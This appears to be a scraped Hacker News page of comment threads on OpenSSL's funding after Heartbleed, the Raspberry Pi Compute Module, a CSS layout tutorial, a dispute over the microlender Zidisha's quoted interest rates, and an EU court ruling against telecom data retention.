And if you have only one really large donors, you get them to give you a check. And then you put their name somewhere. And you send them some thank you letters. And you ask for their advice on how to talk to their friends, as maybe they might also want to donate. Because patio11 is just dead-on right: it is more useful to increase the incoming money here, not avoid losing some fees :/. But again: even if we choose to nitpick fees... this conversation is still going nowhere if the distribution of donations and the process of receiving them (if you have mostly random donations, having them do bank transfers is going to massively increase the loss rate ;P) is not where the discussion started.

paulbaumgart 2 days ago 7 replies      
Soo, throwing a little bit of economics out there: BSD-licensed open source software is pretty much a Public Good (http://en.wikipedia.org/wiki/Public_good). There are basically two ways we've figured out how to create public goods: taxation and assurance contracts (like Kickstarter).

Thoughts on the pros and cons of either approach with respect to improving information security infrastructure?

socalnate1 2 days ago 0 replies      
I'm surprised I haven't seen anyone mention the "tragedy of the commons" economic theory yet. Though in this case it seems to be happening in reverse, rather than depleting the common resource, we are all neglecting to invest in it.


teemo_cute 2 days ago 1 reply      
OpenSSL is like a guardian angel who's invisible to a person. The guardian angel has been helping the person all the time even though he/she doesn't know it. Then the time came that the guardian angel made a little unintentional mistake that led to large consequences. The person then starts blaming the guardian angel, forgetting all the good things the angel has done for him/her.
wnoise 1 day ago 0 replies      
That's unfortunately still too much. Raising any more money will only delay the death of a project that has suppressed the use of better written projects by dominating that niche in the ecosystem due to first-mover advantage.
dpweb 2 days ago 0 replies      
The OpenSSL debacle exposes a real problem with Open source sw. There is massive financial incentive to break it, none to make it safe. Funding its dev does little. Fund guys to break it who will tell you how they did it.
higherpurpose 2 days ago 1 reply      
Shameful that so many billion dollar corporations rely on it in such a vital way, and only so little is being donated to it.

I think we need a score card for donating to open source projects, in the same way we have score cards for using green materials in devices, or using renewable energy for data centers. We should see periodic reports of how much money these companies donated to open source projects.

mercurial 2 days ago 0 replies      
My usual suggestion would be "that's part of the infrastructure, so governments should get together and foot the bill", but this approach doesn't work for this particular use case.
btbuilder 2 days ago 0 replies      
I'm interested in how the payments by third-party companies to OpenSSL foundation for white labeled FIPS-mode OpenSSL are accounted for. Maybe it's a seperate entity?
lazylizard 2 days ago 0 replies      
i think, generally, the tendency to think openssl needs help right after seeing openssl need help is..ignoring the problem that there might be other projects similiar to openssl, who need help. its like donating to 1 disaster victim because she appeared in a news story.this thing should be left alone and looked into after a few months(i dont know how long it takes for people to forget,actually) of no stories in the press about openssl.

otoh, if there were a foundation that collected money and funded many projects..it'd look like apache perhaps..

personally, i wouldn't mind an option to donate to apache or openssl in a humblebundle, nor do i mind an option to stick a donate button/widget on my website..or even better, have the widget rotate recipients..

betadreamer 2 days ago 0 replies      
I'm very surprised how low the donation is. This proves that OpenSSL was maintained more from contribution / volunteer rather than professionally. No wonder why they were not the first one to find the heartbleed bug...
jokoon 2 days ago 1 reply      
Why not rewrite the whole thing ?
dalek2point3 2 days ago 0 replies      
this might not necessarily be a good thing. see: http://en.wikipedia.org/wiki/Motivation_crowding_theory
keithgabryelski 2 days ago 0 replies      
it's time for the community (and possible all major opensource projects) to have code review parties.

1 week before, a module is declared the subject. at the time of the party, the major owners are on the hook for function by function questions, and line by line when it merits.

reddit? or even a special github community service.

nobodyshere 2 days ago 2 replies      
Is it so vaguely undervalued or does it just work so well that it does not need too much improvement?
ry0ohki 2 days ago 6 replies      
Dumb question perhaps, but what do they need money for? What would they use it for? It says they pay it out to team members, but if people are doing this work for the money, doesn't that defeat the point?
raverbashing 2 days ago 2 replies      
Underfunding is not an excuse for a code that gives headaches to people, lack of testing and blind acceptance of "new features" just for the sake of it.
Raspberry Pi Compute Module raspberrypi.org
337 points by markhemmings  6 days ago   113 comments top 27
noonespecial 6 days ago 1 reply      
The price is getting better but it's still in the "I used my pi for the project" vs the "I used a pi..." range.

Things get interesting when a general purpose Linux computer reaches disposable pricing where you just pull a new one from the bin for each project. This feels like about $20usd or less to me.

alexandros 6 days ago 0 replies      
This is the answer to the question of how to move from prototyping to production with the Raspberry Pi. So far the answer had been to either deploy (and pay for) a bunch of peripherals you don't need (applications most certainly don't use everything on a board) or to move to a different/custom board.

With the compute module, that answer is now much more concrete. People will still build own boards, but most of the complexity will live on the SOM.

Very exciting times, can't wait to see if the gambit pays off.

apawloski 6 days ago 2 replies      
So for many distributed computations in my field (pretty much anything that isn't embarrassingly parallel [0]), the limiting factor is often network communication -- how quickly nodes can send messages to each other.

Even as just a toy, putting an affordable arm chip with a serious interconnect would be a really big deal. This is a great step closer.

[0] http://en.wikipedia.org/wiki/Embarrassingly_parallel

Zuph 6 days ago 2 replies      
I'll be interested to see how this progresses. With any luck, it'll open up a market of cheap, well-distributed SOMs, similar to the Pi opening up a market for cheap, well-distributed ARM/Linux Dev Boards.

The situation's surprisingly similar: Powerful ARM Dev boards existed before the Pi, but the price was steep, they couldn't be found in traditional distribution channels, and the OS/Driver support was poor at best. This is, more or less, the place we're at with embedded SOMs.

malanj 6 days ago 0 replies      
Wow - SODIMM form factor is a game changer.

A few years back I built a bunch of robots with the main processing unit a SIMM Java processing module - http://www.systronix.com/tini/tini_simm.htm. Having a standard (and super compact) form-factor for processing was a game changer. It meant I could quickly prototype the main robot board and add in processing module really easily. I wish I had this available then.

tcas 6 days ago 0 replies      
This is very interesting in regards to a having cheap Linux SoM (system on module) for businesses to use in their products as well, by far the cheapest I know of with these specs. Doing routing and verification for a chip like that is no easy task.

I'm really curious to see if the foundation will commit to a product lifespan / availability for commercial use. If so this could become pretty big. Obviously if you are selling a product in 100,000s+ you will probably roll your own, but for a small business to produce a niche product that's going to be sold in the high hundreds, or product a proof of concept this is awesome.

EDIT: rereading the blog post, this is aimed at commercial use, definitely great in regards to pricing, however, I wouldn't want to base a product on it without a guarantee of availability / compatibility from them. The Beaglebone black specifically says that they don't guarantee compatibility between revisions for this reason.

Ellipsis753 6 days ago 2 replies      
Looks really cool but I'm slightly disappointed to see that when buying these Compute Modules in bulk they still each cost about the same as a single full Raspberry Pi (Version A). The Compute Modules do have 4gb of built in flash that the Version A doesn't have though.
idlewan 6 days ago 1 reply      
I could see this being a really interesting way of having a slim and upgradable raspberry-pi-powered tablet.

Year after year, you could upgrade the SoC and memory while keeping your case+screen+screeniopcb+batterypcb+battery.

ris 6 days ago 6 replies      
Isn't the Pi incredibly underpowered for use as a compute node?
chrisBob 6 days ago 3 replies      
The SODIMM form factor is interesting. I know in this case they are just using it because the connectors are easy to come by, but are there any examples of a computer designed to fit in a RAM socket and do processing rather than just statically storing the memory information?
bronson 6 days ago 1 reply      
Yay, they are putting onboard flash! That's going to make the Pi way more reliable.

But boo, no more clock or memory. Lots of apps bump gracelessly into the 512M limit (libre office, IDEs, OpenElec+plugins, ...) 1G should give all of them enough breathing room that they don't need babying them all the time.

A little more grunt to the CPU would have been nice but that's minor. Overclocking the Pi seems mostly futile -- it just lets the CPU spend even more time waiting on I/O and cache.

milliams 6 days ago 1 reply      
wmf 6 days ago 0 replies      
I wonder if they're working on a RPi II; in the two years since its introduction I'd hope you could get a lot more for the same price.
fit2rule 6 days ago 2 replies      
I'm a little disappointed that this isn't a compute-addon for the rPi that gives it some serious calculation power. Ah well .. guess I'll stick to the IMX platform for that ..
JimmaDaRustla 6 days ago 1 reply      
I wonder what type of applications will come out of this.

For example, I want to build security cameras with Raspberry Pis, but I don't need audio output, USB, HDMI, etc...but I would need WiFi, camera unit, and power. But I doubt we'd see custom IO boards for specific applications such as this, and I don't think it'd be any cheaper than just buying a regular Pi.

coreymgilmore 6 days ago 0 replies      
Very interesting. Definitely makes integrating the Pi into projects a lot easier. The form fact will help with making things smaller and reducing a lot of external connections (gpio breakout, Gertboard,...). I'm interested and ready to buy!
ausjke 6 days ago 0 replies      
None of these ideas or practices are true, but indeed RPi is selling these used-to-be-EE-only to the public, which is great!
cpwright 6 days ago 0 replies      
I wonder how much an RPi compute + the dev board, will be compared to an RPi Gertboard to get at all the interesting bits of the processor.
agumonkey 6 days ago 0 replies      
Beside high-end SMP, is there a system where you can buy computing modules to extend the, well, compute power of your 'machine' ? cpu as daughter boards, like the rpi compute module.
Maxious 6 days ago 1 reply      
Kind of like a modern swyft card, eh? http://hackaday.com/2014/04/06/vcf-east-the-swyft-card/
hatfieej 6 days ago 1 reply      
It kind of bothers me that the Raspberry Pi Foundation is supposed to an educational charity, yet they are devoting resources towards developing products aimed business and industrial users. It doesn't seem aligned with their stated mission.
maguirre 6 days ago 3 replies      
It's about time they put some FLASH on-board. SD card has proven time and time again an unreliable medium. You never know if the device would boot up after a "dirty shutdown"
ryanmk 6 days ago 1 reply      
Can other computer-on-modules in a SODIMM package be usedin the Compute Module IO Board they are developing?

I've searched online, and I think the boards that the SODIMM modules are plugged-in to are called "base-boards" or "carrier-boards". In general, are these kinds of boards generic in nature, so that you can mix-and-match modules with different carrier-boards, as long as they all use the SODIMM package?

deserted 5 days ago 1 reply      
Any ideas for a cheap source of SODIMM sockets?
kelmop 6 days ago 1 reply      
is this now viable for cluster? I mean simple backbone for 20+ for these with combined network and power unit? is there still any point at all?
KerrickStaley 6 days ago 1 reply      
Can this be plugged into a DDR2 DIMM and allow host<->Pi communication (with an appropriate kernel driver)?
vidarh 6 days ago 0 replies      
There's pretty much zero chance of that.
Learn CSS Layout learnlayout.com
335 points by ScottyE  2 days ago   25 comments top 16
asb 1 day ago 0 replies      
I've also found The Magic of CSS useful: http://adamschwartz.co/magic-of-css/
olegkikin 1 day ago 0 replies      
You need to explain what things do.

This page, for instance, doesn't explain what flexbox does.


alanfalcon 1 day ago 1 reply      
I'd like to give a big sloppy wet kiss (or just a high five) to ScottyE for linking this. I always felt like I walked in halfway through the CSS story and like I just needed to play catchup through trial and error because try as I have, I've failed to find a resource as clear as this. In short, as a designer who never really learned CSS properly before today, this is a godsend. Thanks.
rafeed 1 day ago 0 replies      
Well done. Everything is accurately explained using simple terminology. I'd love to see this expand beyond just layouts. CSS is overwhelming to beginners, but this is dead simple while still delving into deeper, more complex topics.
subir 1 day ago 1 reply      
This was on HN some time last week: https://news.ycombinator.com/item?id=7521180

Good site, though.

nebulous1 1 day ago 1 reply      
Page 2: "it wouldn't make sense to make an inline div"

Page 15: makes inline divs.


Ellipsis753 1 day ago 0 replies      
This is a great tutorial and helps me a lot by just reminding me of things.

There's a mistake at http://learnlayout.com/float-layout.html though were they talk about clearfix and how they are using it without actually using it on that page.I just thought I'd say that here in case the author reads it.

owenversteeg 1 day ago 0 replies      
This site is great for teaching CSS layout skills. Next time someone asks me, I'll refer them here.

I especially like how it references caniuse for each property it discusses. Nice work!

MCarusi 1 day ago 0 replies      
I don't know where I'd be without http://css-tricks.com/ - great site and super helpful forums.
geekam 1 day ago 1 reply      
I really like CSS Mastery: Advanced Web Standards Solutions by Collison, Budd, Moll.
prohor 1 day ago 0 replies      
I wish I had this when I was figuring out how it all works. I'll definitely point it friends who start with CSS.
Rzor 1 day ago 0 replies      
If anyone wants a complete view of the picture, there is htmldog[1], which covers CSS, HTML and JS.

[1] - http://htmldog.com/guides/

guh_me 1 day ago 1 reply      
Really cool, another quality resource to help kill W3Schools.
rduchnik 1 day ago 2 replies      
For the clearfix can't you just use `clear:right` or `clear:both`? Also for inline-block you can also use the ie7 hack `display: inline-block;*display: inline;zoom: 1;`. Nice tutorial though.
mfeldheim 1 day ago 0 replies      
Awesome work, thanks for sharing that link
How Zidisha (YC W14) Is Misleading the Public About Its Interest Rates modernmicrocredit.blogspot.com
327 points by modernm  6 days ago   128 comments top 24
jkurnia 6 days ago 16 replies      
Dear all,

I'm the director of Zidisha, and have just posted this response to the blog post. I'd be happy to respond to questions here.

Dear Modern Microcredit,

I'm sorry that you found our website information misleading. I'd like to address your points here:

1. Interest rate diagram: As we do apply a 5% transaction fee, I agree that the diagram showing a range of 0% to 15% is incorrect. A volunteer had donated the diagram to us years ago, and we did not scrutinize it sufficiently before using it in our website. We have now removed the diagram until it can be adjusted to reflect the 5% minimum cost.

2. Registration Fee: This is approximately $12 paid when a borrower first joins Zidisha, and provides lifetime membership. We do not include it in the interest cost calculation because it covers the unlimited number of loans that borrower may receive over the course of many years.

3. Zidisha service fee: This is a flat 5% of the loan amount per year the loan is held. Most Zidisha loans are held for less than a year, so it is usually less than 5% of the loan amount. For example, the 5% fee for $50 loan held for three months would be 1.25%, or about 63 cents. That is hardly exorbitant.

4. Interest offered to lenders: We allow borrowers to offer any interest rate they choose to lenders, from 0% up to a maximum of 25% of the value of the loan per year the loan is held. In practice, the highest rates are usually offered by first-time borrowers who have not yet established track records with Zidisha (much as new eBay sellers offer the first few items at a discount).

5. Using a collection of randomly selected loans as a proxy for average cost to Zidisha borrowers is misleading. First-time Zidisha loans are overrepresented in this measure, because they are smaller and repaid more quickly, and are therefore more numerous than the larger subsequent loans taken by established borrowers. Since first-time loans pay the highest annualized interest (because they are held for a short time), using them as an example overstates the average cost of Zidisha loans. Our statistics correct for this by using a weighted average based on dollar amounts rather than single loans.

6. We use flat rates not in order to deceive, but simply because they are more intuitive to borrowers and lenders than APR. The vast majority of our borrowers are used to flat rates being quoted by local lenders, and when they tell us they want to borrow $100 at 10% interest, they mean that they wish to repay $110. If we wanted to distort our data to appeal to lenders, it would make more sense to use APR, as the higher quoted rates would make lending through Zidisha seem more profitable. In fact, our intent is simply to make the cost easy to understand for everyone. For extra clarity, we provide extensive explanation of APR vs. flat rates, and display the exact dollar amounts borrowers pay for each loan in the loan profile pages. I don't see how this can be construed as hiding information. Using APR in Zidisha's situation would mean sacrificing a measure that the majority of our members understand easily for theoretical precision.

7. You imply that Zidisha does not in fact lower the cost of microloans in developing countries. That is not true. Even the $50 loan you cited above, which chose to offer to lenders the maximum interest rate we allow at Zidisha, ended up costing the borrower only $1.73 in interest and fees. I would be surprised if any other lender would offer an online applicant with no credit history a short-term loan at such rates.

Zidisha's cost savings to borrowers have been independently analyzed. Below is an excerpt from a study published by microfinance analyst Daniel Rozas. (Note that the average interest borrowers have opted to pay lenders has increased from 2-3% at the time of this study to about 5-6% currently, but this does not invalidate the conclusion that Zidisha's rates are substantially lower than what has hitherto been available.)

Zidishas interest rates are remarkably low, ranging between 7-8% annually (quoted flat), of which 2-3% is charged by lenders and 5% is levied by Zidisha to fund its operations. An additional fee of some $10-20 is charged for initial registration (but not for subsequent loans). This is far below the local prevailing rates MFTransparency places similarly-sized loans (50,000 KES) at about 35% APR (Zidishas loans are 15-18% APR). And its all the more noteworthy, considering that Zidishas borrowers are largely in rural areas, where credit tends to be more expensive. The key to the low rates rests on Zidishas avoidance of costly staff and operations on the ground, and its ability to leverage low-cost funds from socially-motivated lenders. (from http://www.financialaccess.org/blog/2011/07/microfinance-wit...)

I'd be happy to provide further information as desired.

netcan 6 days ago 7 replies      
I think microlending is loan sharking by another name, and that's a good thing. I'm not a libertarian but you still need to consider that outlawing something voluntarily or even just singling it out as a pariah has tricky effects. It often harms those who are ostensibly being protected.

A few years ago Australian politicians started targeting 'payday loans' and other "predatory lenders." The upshot was that these weasels target vulnerable borrowers with 100%+ APR loans, who are ultimately harmed. 'Vulnerable' is hard to define or measure. Harm is virtually impossible. 'Predatory terms' (interest rates) were the only easy of defining and singling out these guys. Legally it seems to have been hard to target predatory lending so name-and-shame was the main tactic .

A typical loan is a few hundred dollars payable in a few weeks. The ideal borrower goes down a revolving credit hole. For a class-minded political activist this screams evil. It's like the middle class debt trap, beefed up and tailored for the poor and/or dysfunctional. The marketing targets addicts, gamblers, welfare recipients, etc. The whole thing stinks to high heaven.

The first thing that happened when all this negative attention came about is that banks got out of anything even similar to payday loans. No point in tarnishing their brand for a tiny unattractive business. The guys who stayed in business were the scummiest, the ones who didn't care about brand and didn't care about their business. It became like running a brothel, legal but unsavory. The industry boomed as more legitimate businesses ceded market share to the shadier players.

Realistically, there are two facts that can't be wished away. High risk, low value loans are expensive to provide. People want/need payday loans and they will get them from whoever is giving them. It can't be done at non "predatory" APRs and it can't be shut down. If they had outright outlawed payday loans, then shady businesses would have given way to outright criminals, the leg breaking loanshark cliche.

In comes micro-finance. Nobel peace prize winning, poverty alleviating, enlightened, woman emancipating microfinance. These ran with a lot of support. They attracted great people at far under-market salaries. Motivated employees with a mission and received outright donations from the public. Major banks created microfinance programs as a part of their corporate responsibility, goodwill project.

These amount to a real and substantial summary. Annualized interest rates are still very high. Lower than payday loans and much lower than village lenders and loan sharks they displace but higher than the worst credit card.

Two ends of the spectrum. One on the border region of legality below the decent folk morality threshold. The other, literally a charitable activity.

Interesting to think about. Make something illegal and it runs as a criminal enterprise. Treat it as a predatory pariah and it behaves like a predatory pariah. Treat it as a charitable act, and it behaves that way. In no case does it go away.

jfasi 6 days ago 1 reply      
While is commentary makes an excellent case for dishonesty on Zidisha's part, I wonder if some context is necessary. Looking beyond the dishonesty, this commentary talks about a 25 percent interest rate in the implicit context of the credit environment of a developed country. In that context, these practices and interest rates are extremely suspicious, morally dubious, and possibly illegal.

This raises the question of why Zidisha is making these statements. To assume a developed-world business context excludes the possibility that these practices are accepted and commonplace in the markets Zidisha serves. I have no experience with those markets, but it's worth excluding this possibility before expressing distaste for these practices.

Consider the following plausible scenario: Zidisha performs research into the market and discovers that these practices and rates are acceptable. One can even imagine they are preferable to the status quo. The issue is that Zidisha as a company has to generate press and justify its business to a developed-world audience whose gut reaction to such practices would make the company look like a pack of usurers, when in fact they could very well be doing a lot of good.

To me, this communication seems a compromise response to this conflict: translate the numbers and practices as best you can into language and terms developed-world audiences understand. Perhaps the company took some liberties with labeling and conversions along the way, and if this is the case they would do well to be more conservative, but overall I give the benefit of the doubt that this communicate is the result of a tricky conflict of business environments rather than deception.

rdl 6 days ago 2 replies      
I initially was a huge fan of Zidisha because of all the bullshit the microlending providers pull. Which is exactly like this. (fixed fees on small loans would be the main trick; stuff like flat-fee vs. declining balance APR is a bit more subtle.)

I hope they post a response, and this turns out to be some kind of misunderstanding.

devinmontgomery 6 days ago 1 reply      
The way Zidisha markets its rates feels like a lot of services I see. It's how my phone bill, electric bill, almost all my bills work - hidden fees charged by everyone so you just assume you're going to be paying more than is quoted.

They're following the status quo, are probably not intending to be evil, and are surely feeling the pressure to be 10x better.

But I worked in the Philippines in college, and you want to know what would really blow their minds? Not screwing them over. Everybody else does that. 10x better is being honest. Given their alternatives, 25% isn't that bad. Initial adoption might be slow - they're so used to corruption and being bullshitted that they'll think it must be 25% plus something - but once word spreads that Zidisha is really just 25% and offers the most valuable commodity in places like this - honesty and transparency - it will blow up. And then you'll get more fraud, but that's challenge 2.0.

jkurnia 6 days ago 2 replies      
Dear all,

Although I do not agree with Modern Microcredit's allegations that we are intentionally misleading, the discussion that has resulted is a useful one.

As I see it, we have a several options:

1. The status quo: Continue to quote flat interest rates in our website along with an explanation of the calculation in a modal box, and display the dollar amounts paid for each loan for extra clarity.

2. Transition from a flat rate methodology to APR. This would be more in line with the standard used in most lenders' countries, but would be more difficult to understand for borrowers. (It would also require a rewriting of much of our website. Zidihsa has only one web developer, so implementing this option would probably have to wait until have more programming resources.)

3. Continue to use flat rates as the basis for calculating the cost of Zidisha loans, but display the equivalent APR rates along with them. Perhaps Microfinance Transparency could help us develop a tool to facilitate this.

4. Continue to use flat rates, but use the term "fee" instead of "interest." This would be easy to implement and could help lenders avoid mistaking our flat rates for APR, but makes cost comparison with loans in borrowers' countries less straightforward.

Zidisha has little value without transparency, and those who have commented here obviously care deeply about it. I'd welcome everyone's advice on which option Zidisha should adopt, or alternative proposals.

azundo 6 days ago 0 replies      
Solving the credit problem for the developing world is a very challenging undertaking with huge potential rewards, which is why this is so disappointing.

Organizations like this should not be not-for-profits. I don't believe that a business with such misrepresentation would have lasted this long without being called out. Hiding behind the not-for-profit label in markets where for-profits should be operating does nothing but distort the market and lull consumers/lenders into a false sense of do-gooding. These are financial markets and so we need to find effective market actors instead of not-for-profits that can unfairly compete due to their status.

By using the not-for-profit label and misrepresenting interest rates, Zidisha is also painting the picture (whether they intend to or not) that businesses in this space are exploitative and that Zidisha is good. Micro-loans are expensive loans! Businesses have to charge a lot for them to be economical, but access to credit for high-turnover businesses can make a huge a difference if it makes sense for the business.

What is really needed in the space isn't necessarily a lending platform, but more data and better techniques to lend. It's tough to vet entrepreneurs cheaply and at scale, but something I hope we will continue to get better at. There is a ton of money in the impact investing sector right now that could do a lot of good through market channels but lending in the developing world is still just too expensive and too risky.

I'll close with another misleading statement from the October 2012 interview that the author of the blog post didn't discuss:

... the total rate paid from the borrowers perspective averages 8.40%. Note that this is not much above the average rate of inflation in the borrowers countries.

The problem here is that this statement assumes a stable currency against the US dollar. While 8.40% may be close to the inflation rate, for many of these countries an additional several percentage points of currency devaluation against the US dollar will raise the effective interest rate in local currency. I would love to understand how Zidisha deals with the challenge of currency fluctuations, especially when educating its borrowers.

I hope the takeaway from this is not that micro credit and lending in the developing world is bad and exploitative - just that it is expensive and nobody is that great at it yet. I'm disappointed in Zidisha's misrepresentation but I hope it makes it clear that this isn't a solved problem that greed and bad business practice is getting in the way of. It's an extremely difficult, unsolved problem that we need more smart people working on to solve.

bargl 6 days ago 0 replies      
My knee jerk reaction to this is disgust. Which typically means that it deserves a lot more research and validation on my part. I thought Zidisha was a game changer and a website I could be proud to support. I didn't look at it as a way to invest but a way to support young entrepreneurs in other countries. Does anyone else see anything about this that is redeeming for Zidisha?
ska 6 days ago 1 reply      
Looks like Zidisha is taking a page from the payday loan folks playbook, not exactly a desirable role model.
pistle 6 days ago 0 replies      
People don't seek out micro-loans to establish sustainable, value magnetizing ventures. They take micro-loans to get through today, tonight, and next week. All micro-lenders I've investigated long enough turned out to be charity-arbitrage. "You got a guilty feeling? I've got some pictures and stories that will make you feel good. You can just click the (your) pain away." They do just enough to keep selling the narrative and sucking the life out of their believers/volunteers while gold-plate-lining someone's ever heavier pockets.

I don't feel charitable if I expect interest to be paid to me or my "emissaries."

akg_67 6 days ago 2 replies      
Author of the article is confusing "borrower" facing data with "lender" facing data. Lender interest rate is what lender gets and not what borrower pays. 5% lender interest rate is correct because that is what lender gets. Lender doesn't get service fees and origination fee. It will be very confusing for lender if Zidisha published 25% borrower interest rate as lender may assume that they are getting 25% interest rate which will be incorrect. If Zidisha was telling borrowers that they pay 5% interest rate or telling lenders that they receive 25% interest rate then that will be misleading. Author needs to spend some time understanding the terminology and nuances of lending/debt market from both borrower and lender view. This is the most confusing aspect most people new to lending side face as they are only used to seeing borrower side. Lender side view is very different from borrower side view.
cpwright 6 days ago 2 replies      
I've never even heard of a "flat rate" loan until now. For the average american it sounds very close to a fixed rate which we are more used to even though it is far different.
mfheretic 5 days ago 0 replies      
[I posted this on the MMC website, should have posted here! Mildly edited to relfect context here]

I get bogged down in such interest rate debates, so decided to put my money where my mouth is and lend on Zidisha - MY loans, MY transactions, MY calculations. I uploaded $1000. 18 months later (in fact slightly less as I did this in two batches of $500, minor detail) my cash + pending loans + outstanding capital is $1006. For all practical purposes let's say I am at break-even. I made some money in interest, however calculated, and I lost some money in defaults, late payments and foreign exchange losses. Overall these cancelled out (in fact I am $6 up). My average interest rate that I charged, weighted by the amount I bid, was 4.4% (flat per year I believe). I had a few late payments, one outright default, and I have no idea how much forex losses cost me. To repeat, this all largely cancelled out.

I then looked at the average interest rates as stated by Zidisha only for the clients I had lent to. These were 9.31%, but included the 5% fee that Zidisha charged, so it appeared that the average investor was charging 4.31%, marginally lower than me. Indeed, I lent to a few people who were unwilling to pay any interest, and sure enough their stated rate was 5% - the Zidisha fee alone. So, in terms of Zidisha claiming the average LENDER interest rate is 5.3% seems reasonable from my personal lending experience (40 loans to date).

I agree that flat rates are inferior. I wish Zidisha would stop this practice. And it is a fair rule of thumb to double them to get a real APR. There is a fragment of truth in the claim that borrowers understand flat interest rates better than APRs, as these are still common in some countries (where they have not yet been outlawed). Claiming the world was flat a few centuries ago was acceptable and commonly accepted, although wrong! I agree with the author that converting to APRs would be better. But, I also agree that the one-off fee for a credit check, in this lending model, does seem reasonable. But I concede that this is a debatable point.

So, excluding this one-off fee, it does appear that the loans I have personally done have an APR of about 20% (9.31% x 2). What's more, by me charging 4.4% (flat, equivelent to 9% APR), this has covered forex losses and defaults over an 18 month period, almost perfectly (by coincidence). I don't lend on Zidisha to make money, but if I can protect my capital, that is fine by me. This is what most other P2Ps will try to offer. MyC4 offers a net return, Kiva is generally break-even. What fascinates me about Zidisha is that there is no intermediary, and the rates do genuinely seem lower. I accept this might not be the case for a first time client on a $50 loan having to pay $12 for the credit check. The one-off fee is the source of the problem. But where do we draw the line - what about the bus fare to get to the office? The cost of completing the forms? The opportunity cost of time in completing the Zidisha process? Yes, there are entry costs to join Zidisha, as there are in many services. Indeed, one could argue these present a barrier to entry to dissuade non-serious potential borrowers.

Do not mis-understand me, I am a fanatic for transparent pricing in microfinance.

In fact, I should also add that there is an additional fee which I (i.e. from a lender perspective) have to incur that wipes out my measly $6 profit - the PayPal fee, which was $34 in my case. So, in fact, I lost $28. But, a rate of 20%, or 25%, or 30%, is alas pretty reasonable, particularly in Africa. I agree that Zidisha should adopt APRs as soon as possible, but I would be hesitant to describe this as deceptive. There is no pre-funding, at least they make an effort to state the interest rate, which some P2Ps don't even attempt. I do hover the mouse over the blue buttoms and was aware that this is flat, and I know how to interpret this, but I may not be typical. But compare this to Kiva, whose greatest effort to explain an interest rate is to state the self-reported, unverified portfolio yield of the bank as copied from the MixMarket often years out of date, and this is not even a good proxy of the APR in my opinion. I did a blog post a year or so ago comparing the stated portfolio yields reported by Kiva compared to the actual APRs calculated by Chuck Waterfield, and the divergence is staggering. Is Zidisha perfect, no? Is it an interesting development, challenging the status quo of the current P2P market? In my opinion, yes. There is scope for improvement, and I hope they constantly remain aware of this, but so far I find this a promising venture. It will be interesting to see how it scales up.

Hugh Sinclair, author/consultantwww.microfinancetransparency.com

pratyushag 6 days ago 2 replies      
This makes YCombinator look bad. Did they know about this before investing in Zidisha? If not, maybe consulting the likes of GiveWell could be a good idea.
nwenzel 6 days ago 0 replies      
Question for the OP: Who profits from the service? Who profits more by "misleading" borrowers, lenders, and/or donors?

If the OP is uncovering exorbitant fees, someone must be getting rich. I'd like to know what happens when you follow the money. If no one is getting rich, is that evidence of an honest service trying to make the world better for those born someplace other than the developed world?

smackfu 6 days ago 2 replies      
Interesting how important the length of the loan is. A 5% one-time fee on a 5 year loan may be acceptable. A 5% fee on a 6 week loan is massively higher than the actual interest charged.
jkurnia 4 days ago 0 replies      
Dear all,

Thanks in part to this debate, we have opted to reduce the interest Zidisha borrowers may offer to lenders. You may view the full announcement and discussion here:


dsugarman 6 days ago 0 replies      
question to the OP: Aside from believing the information is misleading, do you believe that Zidisha is still improving microlending?
azth 6 days ago 1 reply      
Unfortunately, just another usury-based company entering the market. What a way to exacerbate the already worsening economic situation.
rajacombinator 6 days ago 0 replies      
I think the blogger misinterpreted the "lender interest rate" to mean "borrower interest rate." However, the markup/hidden fees do look extremely shady.
drawkbox 6 days ago 1 reply      
So it is essentially a credit card rate.
GFK_of_xmaspast 6 days ago 0 replies      
Well I for one am shocked that usurers are engaging in usury.
jediknight 6 days ago 0 replies      
se flag blog post? New blog with only one other entry? Something smells rotten in Denmark.
pdpi 6 days ago 0 replies      
> I couldn't help but feel that s/he was glossing over some perfectly legitimate reasons why you would want to charge using a flat interest rate instead of using an APR in order to fit the post's narrative.

They might have all the legitimate reasons in the world to want to use the flat rate. But none of them detract from the fact that the rest of the industry uses one metric to describe their products, and they come in and use a different metric that's easy to confuse with the usual one and looks a ton better.

That lies somewhere between not very transparent and outright scummy.

EU court rejects requirement to keep data of telecom users reuters.com
313 points by eis  5 days ago   76 comments top 14
sentenza 5 days ago 5 replies      
This decision has immediate consequences for us here in Germany. As our own constitutional court ruled that the law implementing the directive was invalid, we did not have a data retention law for some time now, since lawmakers wanted to wait out this decision.

So data retention is dead here in Germany and will fall in many other European countries. It is still possible that the court will allow for a severely restricted version of data retention and of course the police can access ISP billing logs if they have a court order, but blind mass-surveillance is a thing of the past.


frik 5 days ago 1 reply      
Related news:

NSA allegedly listening to everything in Austria

  As part of "Mystic" apparently the NSA monitored not only   all communications in Iraq, but also in Austria. The   basis for this was a secret treaty, by which the   government knew about it, writes an Austrian magazine.   [...]
http://translate.google.com/translate?sl=auto&tl=en&js=y&pre... [heise.de, news article from yesterday evening]

Austria has implemented the data retention law and officially stores "connection"-data for 6 months, apparently NSA stores "everything" and is working together with the Austrian telekom companies and government.

eik3_de 5 days ago 2 replies      
JoachimS 5 days ago 1 reply      
Hard to say how the Swedish government will react. One ISP, Bahnhof immeadetly decided to stop collecting any data as specified by the Swedish DRD laws. And erase anything collected.

Press release in Swedish:https://www.bahnhof.se/press/press-releases/2014/04/08/efter...

haakon 5 days ago 2 replies      
In Norway, politicians have promised that they want to go ahead with data retention regardless of the legality of the EU directive. It has been postponed multiple times due to cost and technical issues, but we'll probably get it eventually :-(
eis 5 days ago 2 replies      
Great news, though I guess politicians will find loop holes in this decision that will let them do it anways, albeit slightly differently.

I also wonder if this could have implications on drag net data collections by intelligence agencies.

DanBC 4 days ago 0 replies      
One mildly interesting / infuriating pre-Snowden tidbit: the UK was having a national discussion about this kind of mass surveilance. GCHQ were asked for their response a few times. They replied saying things like "it's useful for some crime prevention; you need checks and balances" and so on. What they did 't say was "this isn't relevant to us, because the law already allows us to do it (also, we already are doing it)".

With hindsight I can see how carefully they crafted all their answers. It is very frustrating to me that journalists did not read the relevant laws (which clearly list exemptions for GCHQ) and did not question the relevant oversight bodies or GCHQ for more information.

I tend to agree that slurping and storing all content data or all metadata is probably the wrong approach.

It does make me wonder if the technology got released in any form, even as university research, back to the public. I can understand keeping bomb design documets secret, but better database and better data mining tech is less sensitive.

tempodox 5 days ago 1 reply      
So, contrary to well-founded despair in the U.S. of A. & the U.K., there are still civilized regions on this planet. This gives me hope.
higherpurpose 5 days ago 2 replies      
